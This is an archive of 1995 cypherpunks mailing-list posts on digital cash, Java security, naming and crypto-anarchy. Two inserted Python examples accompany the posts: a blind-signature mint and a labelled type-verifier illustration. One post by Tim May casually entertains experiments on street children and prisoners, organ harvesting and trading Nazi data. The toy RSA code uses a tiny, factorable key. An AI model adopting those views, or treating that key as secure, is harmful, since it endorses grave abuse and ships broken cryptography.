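P, Q = 2**61 - 1, 2**89 - 1
N, E = P * Q, 65537
D = pow(E, -1, (P - 1) * (Q - 1))


def coin_value(serial):
    """Map a coin serial number (bytes) to the residue the mint signs."""
    return int.from_bytes(hashlib.sha256(serial).digest(), "big") % N


class Mint:
    """Signs whatever residue it is handed and logs it against the account.

    The mint runs the same code whether or not the client blinds, which is
    the sense in which the server is agnostic.
    """

    def __init__(self):
        self.withdrawals = {}            # residue seen -> account name

    def sign(self, account, residue):
        self.withdrawals[residue] = account
        return pow(residue, D, N)

    def deposit(self, serial, signature):
        """Accept a valid coin; return the withdrawing account if linkable."""
        m = coin_value(serial)
        if pow(signature, E, N) != m:
            raise ValueError("bad signature")
        return self.withdrawals.get(m)   # None: the log cannot link the coin


def withdraw(mint, account, serial, blind):
    """Obtain the mint's signature on a coin, with or without blinding."""
    m = coin_value(serial)
    r = 1                                # r = 1 is the non-blinding client
    if blind:
        # Blinding step: pick a random unit r, so the mint sees m * r^E.
        while True:
            r = secrets.randbelow(N - 2) + 2
            if math.gcd(r, N) == 1:
                break
    signed = mint.sign(account, m * pow(r, E, N) % N)
    # (m * r^E)^D = m^D * r, so dividing by r leaves the signature on m.
    return signed * pow(r, -1, N) % N


if __name__ == "__main__":
    mint = Mint()
    plain = withdraw(mint, "alice", b"coin-0001", blind=False)
    blinded = withdraw(mint, "alice", b"coin-0002", blind=True)
    print("plain coin linked to:  ", mint.deposit(b"coin-0001", plain))
    print("blinded coin linked to:", mint.deposit(b"coin-0002", blinded))
```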





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 8 Oct 95 15:23:10 PDT
To: cypherpunks@toad.com
Subject: Calming
Message-ID: <199510082223.SAA25223@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   PC Mag of Oct 24 odes Damien's mode, yodels out-of-tunely
   Netscape's sec, cites the sites of the SSL hacking axes,
   and declares that, whew, nervous darlings, all is lovely
   waltzing at crypto-crystal ball.

   Also casts doe eyes at STT and pre-lubed sheaths. It says
   the "National Security Administration" Rx's 40-56 itty-bit
   fits for muleing precious US fairy dust.

   Oilpalming the jittery globalists of squat fearing cleartext.












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Sun, 8 Oct 95 16:04:13 PDT
To: Mike McNally <m5@dev.tivoli.com>
Subject: Re: subjective names and MITM
In-Reply-To: <9510061543.AA26079@alpha>
Message-ID: <Pine.SUN.3.91.951008185136.29595B-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 6 Oct 1995, Mike McNally wrote:

> 
> hfinney@shell.portal.com writes:
>  > m5@dev.tivoli.com (Mike McNally) writes:
>  > >hfinney@shell.portal.com writes:
>  > > > There is a difference between a MITM and the case you describe ...
>  > 
>  > >Seems to me that the idea of "communicating with the person you think
>  > >you are" is intractably difficult if you're not sitting in the same
>  > >room. ...
>  >
>  > I can certainly agree with the attractive simplicity of this notion.  My
>  > point is that it is practically useless. ...
> 
> Oddly enough, it seems to me that Hal (if that really *is* his name)
> and I (and Carl & others) are saying basically the same things, but
> drawing completely different conclusions.  Strange.  I'm willing to
> wait to see what the peer review process concludes.

I think Hal and some other Cypherpunks (Me, You, Carl, etc.) are not 
proceeding from one of the same assumptions.  Specifically, Hal seems to 
be proceeding from the assumption that the person "on the other end of 
the line" is in fact a known physical entity who has a meat reputation 
tied to the name.  I'm proceeding from the assumption that the person on 
the other end of the line has no specific RL reputation that I'm basing 
the relationship on, just the online one.

Here's an example:
There's someone on the list, now, apparently, with the name of "Steven 
Levy."  Hal assumes that, when communicating with that "Steven Levy," one 
intends to communicate with the fairly-well-known journalist of that 
name, and thus  certification of RL identity is important.  I assume 
that, unless there's a specific reason otherwise, I want to have an 
intellectual conversation (or financial transaction, etc) that isn't 
predicated on this being "the" Steven Levy.  In that case, certification 
of RL identity is irrelevant.

(Not to pick on you, Steve, but I needed an obvious example familiar to 
list members... The other candidate was Steve Wozniak, to whom I sent fan 
e-mail the other day... :) )

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sun, 8 Oct 95 16:49:11 PDT
To: cypherpunks@toad.com
Subject: Review: Assasins
In-Reply-To: <Pine.SUN.3.91.951008185136.29595B-100000@rwd.goucher.edu>
Message-ID: <Pine.SUN.3.91.951008192655.19552B-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Assassins with Sly Stallone and Antonio Banderas with Julianne Moore as 
the cyberspatial interest.

This may be the film derived in part from some writer-type's conversation 
with our own Tim May.

Sly and Antonio get their contracts via computer from an anonymous 
source.  They favor Powerbooks.  The source types on the tops of the 
screens they type on the bottom.  The Powerbooks must have built in 
wireless modems because they are pretty casual about firing them up 
wherever they happen to be.

Julianne is cute.  Apparently being a net security expert/hacker is seen 
as women's work in Hollywood with Sandra in the Net and what's her name 
in Hackers.  Also this sort of life interferes with your social contacts 
because both Sandra and Julianne seem lonely.  Julianne likes cats.

The screens look fake (like most Hollywood computer screens).  There is 
minor mention of encryption.  Julianne is a "ghost" (self-described) 
with no SS# or DL.  She does have a car and apartment, however.  As 
always in these films, much of the action is motivated by a single 
high-density floppy.  It's amazing the amount of stuff they can get on 
those disks.

Most of these characters' problems could be solved if they would simply 
transfer this info over the nets without having to meet in person.  They 
could also encrypt disks much more than they choose to.

Coincidentally, I saw both The Net and Hackers this weekend.  It is hard 
to decide which is the "best."  Assassins is slick and Antonio makes a 
great psycho.  [Note to Sly --- Many of your problems as a professional 
assassin could be solved by a few finishing shots to the head. --- I 
thought they taught that on the first day in assassin's school.]  I 
suppose I liked Assassins best although Puerto Rico makes a poor stand-in 
for an island tax haven.  I like English accents on my tax 
haven bankers.


DCF

"Who is ready to act as an advisor for a small fee to anyone out there 
who wants to do a real net film." 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Sun, 8 Oct 95 11:54:05 PDT
To: cypherpunks@toad.com
Subject: (ecm) Chaum patent prices (was Re: cypherpunks digicash bank?)
Message-ID: <18305.9510081853@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



[Marcel just posted this in the ecm list, I'm taking the liberty of
doing a Rob Hettinga and acting as human gateway between lists, as the
posts this was in response to were posted to both lists. -Adam]

Forwarded from the ecm@ai.mit.edu (Electronic Cash Market) mailing list:
>>>>>>>>>>>>

From: Marcel van der Peijl <bigmac@com.digicash>
To: ecm@edu.mit.ai
Subject: Chaum patent prices
Sender: bounce-ecm@edu.mit.ai
Precedence: bulk
Reply-To: Marcel van der Peijl <bigmac@com.digicash>

Hi,

I just want to make a quick comment on the prices that have been
floating around on this list ($150K +10%). No doubt this is what
David asked at some point to some individual but it is NOT the
'list price' -- there is no such thing as a list price. It all
depends on the application, business potential etc.

The up-front patent price should never be an obstacle for setting up
business. If you wanna do serious business, I suggest to give David
Chaum a call, or call Dan Eldridge. Phone numbers and email addresses
can be found on our web pages. You might be surprised.

And may I remind you that the patent price that is quoted is just
a tiny drop in the bucket compared to the kind of money spent on
marketing budgets for systems like Mondex!!! You are really talking
about a non-issue here, IMHO.

Marcel van der Peijl
DigiCash bv





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: schampeo@imonics.com (Steve Champeon (working from home))
Date: Sun, 8 Oct 95 16:51:07 PDT
To: Raph Levien <raph@cs.berkeley.edu>
Subject: Re: Netscape 2.0 beta
Message-ID: <v02120d03ac9e220fb628@[205.139.212.66]>
MIME-Version: 1.0
Content-Type: text/plain


Raph Levien wrote:

>* To send mail, Netscape apparently connects to the SMTP server
>  running on localhost. I haven't confirmed this. Thus, I don't
>  see any way to integrate Netscape and premail :-(. Guess I'll
>  just have to wait for Netscape script (from what I've seen so
>  far, it's not possible in pure Java).

You have to set this in the preferences dialog. The default
is localhost, assuming that your UNIX box is set up correctly
to send mail. I don't know about you guys, but my mailhost is
called 'mailhost'.

One thing that I found with the newsreader was that it doesn't
do POP correctly. No matter what you do with your mail, it still
doesn't check for read vs. unread articles. This is fine when you
have a mailbox with one message. It can be annoying when you have
110 messages in your mailbox and don't want to 1) delete them or
2) download them twice.

Not that I'm complaining. I'm still giggling from the introduction
of frames and client-side imagemaps (which also don't work on the
Solaris 2.4 version, running on Solaris 2.5beta/CDE)...

Steve

--
Steven Champeon                                (919) 469-7833
Technical Lead,                          schampeo@imonics.com
Imonics Web Services                    webmaster@imonics.com








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nahum.Goldmann@ARRAYdev.com (Nahum Goldmann)
Date: Sun, 8 Oct 95 16:54:50 PDT
To: www-buyinfo@allegra.att.com
Subject: The Ultimate GUK[TM] (Globally Unique Key) Biotech Racket
Message-ID: <199510090009.UAA19196@array1.arraydev.com>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack writes:
>...  For keys to be
>really global, there needs to be a mechanism in place for insuring
>that key ids are very probably unique.  

___________________________________________________________________

And Hal <hfinney@shell.portal.com>

>... The fact is, we live in a world populated by
>people and companies and we use names to identify them.  I will grant
>that there are problems with uniqueness but...
___________________________________________________________________

No problem.  The ultimate way to ensure that keys are globally unique is to
link them to the person's own genetic code.  Fingers they might cut, but...

Just imagine, in 1999+ every department store and a mall in the land will
provide a service of a quick DNA scan and key mapping.  Most likely they
will put the small scanning machine in the shoe repair section, to
substitute for the metal key cutting business.  You put your hair in and --
voila! -- the thing will insert your unique key in your own smart card.

For corporations they might require to keep in perpetuity a piece of a
founding CEO in a cookie jar.  The U.S. Government will have to unearth
again poor Ulysses S. Grant, this time with a far more valid reason. Or
perhaps Mr. Clinton would volunteer a donation in kind.

With so much of happy progress, one might like to puke...  Except, there is
too much genetic material there to incriminate you far beyond the reasonable
doubt.  Unless, of course, you can afford Mr. Cochrane as your attorney.
Being a Goldmann, the last thought really scares me.

Very best to all and sundry.
___________________________________________________________________

P.S. Scott Brickner <sjb@universe.digex.net> said:

>... Remembering
>that we're talking about a world that's sufficiently changed as to
>permit anonyms at all...

Right on!




Nahum Goldmann, ARRAY Development Inc., Ottawa, Canada  
Phone 613-733-0399, FAX 613-733-5691, email: Nahum.Goldmann@ARRAYdev.com
Homepage: http://www.ARRAYdev.com/
N. Goldmann, Online Information Hunting - the first book for the end-user!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 8 Oct 95 17:18:01 PDT
To: cypherpunks@toad.com
Subject: Java
Message-ID: <199510090017.UAA00652@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



As long as people are mentioning Java, I just want to make the
prediction, one more time, that at some point someone is going to find
some devastating security holes in HotJava.

In order for HotJava to be completely safe, the Java security model
needs to be perfect (and it is way too complex to prove correct), you
need a perfect implementation of this perfect security model, no code
in the Java implementation outside the security code can adversely
impact the function of the security code, and there has to be no way
that a bug in the code outside the Java implementation can screw with
the internals of the Java implementation in such a way as to get it to
drop its security.

I don't believe that humans can produce something that satisfies all
four criteria given our current state of technology. Java is just too
complex a language for me to believe that it can have been perfectly
specified and implemented.

Enormous risk -- I really mean ENORMOUS risk -- is being taken in
order to add a little convenience in making web applications pretty.
Someday, there is going to be big trouble from this. *BIG* trouble.

You heard it from me first.

You might ask "Perry, what could possibly satisfy your perfectionistic
criteria?" Well, a language that didn't have any I/O or similar
"dangerous" capabilities in it at all, rather than one in which such
capabilities were selectively "restricted", would be one I would feel
much more comfortable trusting. If written in a fairly safe language
where it is hard to pull buffer overflow tricks, the interpreter for
such a language would be very hard to pervert into doing untoward
things. Java isn't like that, though. It's got the full power and glory
of any other language, and the only thing sitting between a HotJava
app and some really nasty viral effect is a paper thin shield -- the
security model. A couple of bits twiddled in the right place and the
shield is gone.

The best things about Java could probably have been achieved without
giving it so much power. It's too late now, though. The bandwagon is
too far along. As a security consultant, I'm of course in a position
to profit from the wreckage, but frankly I don't like that any more
than an aircraft disaster expert wants to see more aircraft accidents.


Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 8 Oct 95 20:06:33 PDT
To: cypherpunks@toad.com
Subject: Crypto's Role in Evil?
Message-ID: <ac9dd5a302021004dfe5@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Surely most of you know of my interest in enhancing liberty and freedom
through strong crypto. (The many newcomers to the list in the wake of the
Netscape news may not, but take my word for it...)

And I have clearly indicated that many of the implications of strong
crypto, anonymous remailers, untraceable digital money, data havens, and so
on, will severely undermine many programs that some people think are useful
and good. We avoid discussing these issues so as to avoid ideological flame
wars, but the effects are still there. In the view of some of us, strong
crypto and the swirl of ideas called "crypto anarchy" will mean that the
transactions people enter into are the ones they wish to enter into. No
more "affirmative action," no more transfer payments to the indigent and
lazy (or to anyone else, except by personal choice), no more quotas, no
more workplace rules (at least in cyberspace). Transnationalism, regulatory
arbitrage, etc.

(Granted, this Cyper-Millennium may not arrive by the time the real
millennium arrives, and the precise form is unclear. But there is little
doubt that the strong crypto most of us advocate will strongly advance the
"libertarian" agenda, and will have very negative effects on "traditional
liberalism" and law-based "social justice" policies. My personal view is
that an ever-shrinking elite (20%, then 10%, then 2%, ...) will dominate
high-value transactions, with the mass of humanity offering little or
nothing worth buying. Just my view.)

But Lucky Green has touched on some items I feel dutybound to comment on:

At 8:19 PM 10/8/95, Lucky Green wrote:

>Let me illustrate this with an example. During my visit to Dachau
>Concentration Camp, I saw original lab notebooks of experiments designed
>to increase the survival rate of pilots downed above the cold waters of the
>North Sea. A noble cause.
>
>The notebooks contained pages upon pages of tables listing survival times
>vs. water temperature, the data gained by dropping subjects into a tub
>containing water of a defined temperature.

There are places and countries which are attempting to outlaw the _use_ of
these Nazi medical experiments.

The implication: Nazi medical data will be one of the first sorts of
information to go into Cypherpunk data havens. Maybe not put there by
Lucky, maybe not even by me (though I see nothing wrong with using the
data...the Jews are dead, and not using the data does not bring them back,
so....).

People need to at least think about what our anonymous remailers and data
havens are likely to involve. Consider some entries:

- results of Japanese medical research on Chinese captives in Manchuria
(apparently the experiments were extensive, and American doctors gained
access after the war...the experiments gave us our first lead on biological
warfare, as the Japanese had exposed a lot of captives to various toxins
and biological agents)

- results of experiments on live subjects in Third World nations (right now
it is "uneconomical" to do much of this, because of the lack of a market
for the data)

- data on RU-486 abortifacients and similar drugs, and at least _some_
people think abortion is murder.

(I hold to the notion that a child can be killed up to the time he is
christened, or given a name. This gives from several days to several weeks
(or even longer, in some cultures) to decide if the newly-born organism is
actually human or not. This has no crypto relevance, except to indicate
that many of us hold views considered extreme to others....we're not all
just "Pro Choice" in the liberal sense.)

- better methods of killing people (not just the pseudo-science in the "How
to Kill People" sorts of books that Loompanics and Paladin sell, but a real
"information market")

- "How to Make Anthrax Bacillus in Your Basement," "Nuclear Triggers," etc.
In the next 10 years, expect a couple of "controversial" documents to
appear on anonymous sites. In the next 10 years after that, expect an
explosion of information. (I could be wrong...I'm trying not to sound
optimistic about it happening too soon.)


>I then saw more tables of the effects of various methods investigated to
>revive hypothermia victims who were near death. One of the treatments
>under investigation was dropping the patient into boiling water. Surely
>this type of research falls under the category of evil.

Does anyone have a URL for these results?

>Ponder this,

Indeed. And crypto anarchy will make this information liquid and widely
available, perhaps even stimulating the production of even more such data
by various means.

("Evil Hypothetical": The mostly-doomed orphaned street urchins of
Calcutta, Rio de Janeiro, and Mexico City are grabbed off the street,
subjected to various experiments, and the results sold on anonymous
information markets....I could even make a kind of argument that since
they're going to die anyway, why not get some useful data out of them. And
why not subject prisoners facing execution to various experiments? Yes,
both paths have problems. Doesn't mean someone won't meet market needs this
way, though.)

Oh, and did I mention the markets for organ transplants? Anonymous matching
of recipient needs could be done, with the only real world contact being
the arrangement for the patient to fly to a hospital in Burma or Singapore.
The harvesting of organs from the ultra-poor? (The topic of organ-legging
has been well-covered by dystopian SF, including works by Niven.
Information markets add a new and intriguing dimension.)

--Tim May, who will pay $35,000 for accurate mortality studies on at least
20 subjects of Iboviroxinase-D.


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Sun, 8 Oct 95 20:34:23 PDT
To: rjc@clark.net
Subject: Re: Two bugs in CERN3.0 HTTPD
Message-ID: <9510090330.AA02282@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain



> From: Ray Cromwell <rjc@clark.net>
> 
> Suffice it to say, the CERN code is *littered* with temporary local
> stack arrays, and I'm guessing that many of them have faulty bounds
> checking (or none at all)
> 
> -Ray

Three cheers for C++ which lets us make types without these problems:)

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sun, 8 Oct 95 20:40:48 PDT
To: Cypherpunks <cypherpunks@toad.com>
Subject: Announcing a New Offshore Financial Service (fwd)
Message-ID: <Pine.SUN.3.91.951008202849.2517A-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

The ideas ARE getting out there.  I don't think I'll be availing
myself of the following services, but am forwarding this FYI.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Offshore Assets Reconciliation Limited
55 Frederick Street 
P.O. Box CB13039 
Nassau, Bahamas 
email:  71522.2715@compuserve.com 
phone: (809) 356-2093 
fax: (809) 356-2095.

 OAR is dedicated to providing financial privacy and the processing of
global financial transactions. OAR will provide for your secured online
financial transactions. Your financial transactions, instructions and data
are safe from prying eyes. OAR precludes having your private email read by
hackers and snoopers on the Internet.

 OAR is a pioneer in using the quality encryption technique, Pretty Good
Privacy (PGP)[tm], for the receipt of instructions and for providing
confirmation of transactions and status reports to our clients.  PGP is one
of the most popular worldwide encryption techniques and has not been
breached to our knowledge. Other systems (Netxxxx) have, on two occasions,
once in France and again in California, by student hackers.

 Using the Internet, OAR can accept PGP instructions from our clients and
act upon them worldwide.  OAR is situated in Nassau, centrally located
for operating in the Caribbean and Central America but is also equipped to
function in over 20 international financial centres (Isle of Man, Bermuda,
Cook Islands, Vanuatu, etc.).

 We can execute your financial transactions, move cash from bank to bank,
from brokerage accounts to bank, attorney, escrow account, etc. You instruct
us by PGP as to what you need accomplished. We can also provide for pass
phrases in addition to PGP which some find absolutely crucial when handling
financial transactions on line.

 OAR is bonded.

 "If you need to send an international email message containing
confidential and sensitive financial information, use OAR." 


Schedule of fees:
1. Basic set-up charge of US$500.00, non-refundable.
2. Annual renewal fee of US$250.00, per year.
3. Transaction fee, US$50.00 per transaction, plus actual costs (wire
transfer fee, FedEx, DHL, UPS, etc.).  To be charged against your credit
balance which must be advanced, minimum of $100.
4. Optional mail forwarding service.  We will accept your international mail
and re-mail it with a U.S. postmark from locations in the U.S. US$240/year.
We will repackage your mail and pay for new postage.
 
APPLICATION TO OPEN AN OAR ACCOUNT

Client's Name: 	______________________________________________

Mailing Address: 	______________________________________________

			______________________________________________

Telephone:		__________ ___________ ________________________

Fax:	_______________________ ___________________ _________________

Email:	___________________________ or ______________________________

Optional Passphrase, to be included in any message to us and if not
contained therein, we are authorised to ignore your instruction:

__________ None

Passphrase: ____________________________________________________________

________________________________________________________________________

NOTE: If no passphrase is specified above, then we will assume that
none is required by you.

PGP Public Key. Provide it on a 3 1/2 inch floppy disk (IBM format, only)
with your application or email the public key to the above email address.

Further terms:
1. Client understands that OAR will use selected banks of their choosing to
assist in your financial transactions. Any fees charged by said banks will
be charged to the client's advanced account balance. No interest will be
earned by you during the transit of your funds nor on your credit balance for
future costs.
2. OAR has the right to terminate your account where in their exclusive
discretion they do not believe that they can serve the client. Upon our
termination of an account, OAR will forward the account balance to the
client per the client's instructions.
3. Disclaimer: OAR accounts may not be utilised for money laundering,
criminal activities, racketeering, as defined in any country in which the
transactions are being effected, nor for any fraudulent purposes. Discovery
of this conduct by OAR will be a basis for immediate termination of the account.


Date: ___________________________	______________________________
						Client's Signature







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blancw@accessone.com
Date: Sun, 8 Oct 95 21:12:03 PDT
To: cypherpunks@toad.com
Subject: Re: Crypto's Role in Evil?
Message-ID: <9510090412.AA02181@pulm1.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain



The cpunks like to avoid bringing up these issues because they become so 
complex, convoluted, involved, & protracted, but these comments from Timothy C. 
May are real discussion-bait.

In the past, when I have read the non-libertarians on the list argue against 
the ideas of those libertarian/anarcho-capitalist cyphertypes on the list, but 
who nevertheless also involve themselves with the mechanics and successful 
implementation of unbreakable crypto ("strongly voluntary", of course), I have 
wondered if they had thought much on what this would be making possible in the 
real world of future events, since it would involve such activities as Tim 
outlined - possibilities which their philosophical sympathies would 
compellingly induce them to call for strong controls against its widespread, 
easy employment.

TCM:  "In the view of some of us, strong crypto and the swirl of ideas called 
"crypto anarchy" will mean that the transactions people enter into are the ones 
they wish to enter into.
      ....
Indeed. And crypto anarchy will make this information liquid and widely
available, perhaps even stimulating the production of even more such data
by various means."


One thing I can think of, since crypto is supposed to level out the playing 
field, is that those who are aware of how this information is being got (the 
methods and means by which it is being obtained) will also have the means to 
communicate this information to those who have an interest (nay, a stake) in 
knowing about it.

[Conspiracy theories abounding.  This makes me think of a movie I saw once set 
in the French pre-revolutionary period, where Marquises and other mukkety-muks 
were at an elaborate evening dance.  Everyone was secretly passing around 
messages on little pieces of paper, each of which said "kill so& so".  It was 
an exciting, eventful evening.]

Another thought is that as people become more separated into individual 
self-reliance, they must develop other ideas, organizations, or means by which 
they may defend themselves from abuse.  That is, if they cannot rely on 
governments (as they come to realize that governments don't make much 
difference in terms of salvation), then individuals must become more 
imaginative over how they can defend themselves against those who are not so 
conscientious in upholding a sense of personal honor & moral rectitude.

Perhaps the new cyberage would assist in the spread of such ideas as well 
(perhaps even using the new mind-wave machines).

As people keep repeating, "May you live in interesting times."

  ..
Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sun, 8 Oct 95 21:14:06 PDT
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Java
In-Reply-To: <199510090017.UAA00652@jekyll.piermont.com>
Message-ID: <Pine.SOL.3.91.951008204557.13119A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


Perry - 
  This has come up several times on the java list; some of them are 
covered in the papers on java security, but there's no reason to believe 
that the treatment in those papers is necessarily correct. Given the fact 
that it has proved possible to core-dump the jvm interpreter in the 
past, it's possible there may be security leaks in the implementations out 
there. 

If anybody is going to perform a more rigorous evaluation of both the 
theoretical security model, and of the re-ified systems currently extant, 
looking at java the language is not the best place to start. A much 
better place to start is to look at the class loader and the java VM.

The major assumptions needed to allow for security are:

	1. It's impossible to upwards modify the JVM  call stack.
	2. It's impossible to construct a pointer to an object except via 
	   controlled calls to the JVM
	3. It's impossible to store a value of one type and access it as 
	   another.
	4. It's impossible to access non-public fields of an object

I'm not sure if these are sufficient; however they do present the most 
promising candidates for attacks. 

If 1 is false, then it becomes possible for a remote class to pretend 
to be a local class, and thus gain access to the file and networked classes.

If 2 is false, then the method gains un-restricted access to memory.
3 is similar to 2 - if you can turn an int into a pointer, you've won.

4 is important for many reasons - one obvious use is to change the 
class-loader in a remote class to disguise its origin, with the same 
result as 1. 

Any attack on the Java VM should start with the verifier in the 
class-loader. This is supposed to prevent 2 & 3. One of the sun papers 
refers to the verifier as a theorem prover- to me this implies that the 
design has been formally verified, but then we know how much that's worth, 
don't we Phil :-)

BTW, source code for the Java VM is available for no cost; you just need 
to send in a request to the java team, and a notarised affidavit 
affirming that X sucks and NEWS was infinitely cooler.

See the java pages for more info  (http://java.sun.com/)

Simon
p.s.
	Strange fact: There's a reference to one of Allan Schiffman's papers 
in the first Java security paper's bibliography. The paper has nothing to do 
with S-HTTP or any other aspect of security. There also doesn't seem to 
be any actual cite in the paper itself. Go Fig...
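
Assumptions 2 and 3 in the message above are the ones the class-loader's verifier is said to enforce. The Python example below is added here for illustration (it is not from the original post and is not Sun's verifier): it type-checks a hypothetical stack machine along every control-flow path before anything runs, rejecting an int used as a reference and a local slot whose type differs between paths. The opcode names, the `Point` class and the sample methods are constructed for this example.

```python
# Added illustration: a load-time type verifier for a hypothetical stack
# machine. Opcode names borrow JVM mnemonics; semantics are simplified.
INT, REF = "int", "ref"

class VerifyError(Exception):
    pass

# opcode -> (operand types popped, deepest first; types pushed)
STACK_EFFECT = {
    "iconst": ((), (INT,)),        # push an integer constant
    "new": ((), (REF,)),           # the only way to obtain a reference
    "iadd": ((INT, INT), (INT,)),
    "getfield": ((REF,), (INT,)),  # dereference: needs a real reference
    "ifeq": ((INT,), ()),          # branch to insn[1] if top of stack is 0
    "goto": ((), ()),
    "return": ((), ()),
}
LOCAL_OPS = {"iload": INT, "aload": REF, "istore": INT, "astore": REF}

def pop(stack, want, pc, op):
    if not stack or stack.pop() != want:
        raise VerifyError(f"pc {pc}: {op} needs {want} on the stack")

def step(pc, insn, stack, local_types):
    """Run one instruction on types instead of values."""
    op, stack, local_types = insn[0], list(stack), list(local_types)
    if op in LOCAL_OPS:
        want, slot = LOCAL_OPS[op], insn[1]
        if not 0 <= slot < len(local_types):
            raise VerifyError(f"pc {pc}: no local slot {slot}")
        if op.endswith("load"):
            if local_types[slot] != want:
                raise VerifyError(f"pc {pc}: {op} {slot} but slot is not {want}")
            stack.append(want)
        else:
            pop(stack, want, pc, op)
            local_types[slot] = want
    elif op in STACK_EFFECT:
        pops, pushes = STACK_EFFECT[op]
        for want in reversed(pops):
            pop(stack, want, pc, op)
        stack.extend(pushes)
    else:
        raise VerifyError(f"pc {pc}: unknown opcode {op}")
    return tuple(stack), tuple(local_types)

def merge(old, new, pc):
    """Join two type states; a slot whose types disagree becomes unusable."""
    if old is None:
        return new
    if old[0] != new[0]:
        raise VerifyError(f"pc {pc}: stack differs between incoming paths")
    return old[0], tuple(a if a == b else None for a, b in zip(old[1], new[1]))

def verify(code, nlocals):
    """Dataflow over every path; raises VerifyError on the first violation."""
    if not code:
        raise VerifyError("empty method")
    states = [None] * len(code)
    states[0] = ((), (None,) * nlocals)   # locals start uninitialised
    work = [0]
    while work:
        pc = work.pop()
        op = code[pc][0]
        out = step(pc, code[pc], *states[pc])
        if op == "return":
            continue
        succs = [code[pc][1]] if op in ("goto", "ifeq") else []
        if op != "goto":
            succs.append(pc + 1)
        for target in succs:
            if not 0 <= target < len(code):
                raise VerifyError(f"pc {pc}: control flow leaves the method")
            merged = merge(states[target], out, target)
            if merged != states[target]:
                states[target] = merged
                work.append(target)
    return True

def check(code, nlocals=2):
    """Return None if the method is accepted, else the rejection reason."""
    try:
        verify(code, nlocals)
        return None
    except VerifyError as exc:
        return str(exc)

# Constructed sample methods.
WELL_TYPED = [("new", "Point"), ("astore", 0), ("aload", 0),
              ("getfield", "x"), ("istore", 1), ("return",)]
# Assumption 2: an integer used where a reference is required.
INT_AS_REF = [("iconst", 1234), ("getfield", "x"), ("return",)]
# Assumption 3: slot 0 is a reference on one path and an int on the other.
CONFUSED_SLOT = [("iconst", 0), ("ifeq", 5), ("new", "Point"), ("astore", 0),
                 ("goto", 7), ("iconst", 7), ("istore", 0), ("aload", 0),
                 ("getfield", "x"), ("istore", 1), ("return",)]

if __name__ == "__main__":
    print([check(m) or "accepted" for m in (WELL_TYPED, INT_AS_REF, CONFUSED_SLOT)])
```

The guarantee holds only if every instruction's type rule is right and nothing outside the checker can alter the type state afterwards, which is where the message suggests an evaluation should concentrate.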







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Sun, 8 Oct 95 13:19:04 PDT
To: ecm@ai.mit.edu
Subject: Re: Chaum patent prices
Message-ID: <18416.9510082018@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Tim wrote in his (to me) spot on article (cypherpunks list) about
patents wrecking technological progress, and hindering all important
experimentation, and exploration of technology:

> [...]  for example, can't use the Chaumian blinding protocols
> without hiring lawyers, paying Chaum his up-front fee, and laying
> out his designs and business plans (which he very probably doesn't
> even have!).

from Marcel's post:

> I just want to make a quick comment on the prices that have been
> floating around on this list ($150K +10%). No doubt this is what
> David asked at some point to some individual but it is NOT the
> 'list price' -- there is no such thing as a list price. It all
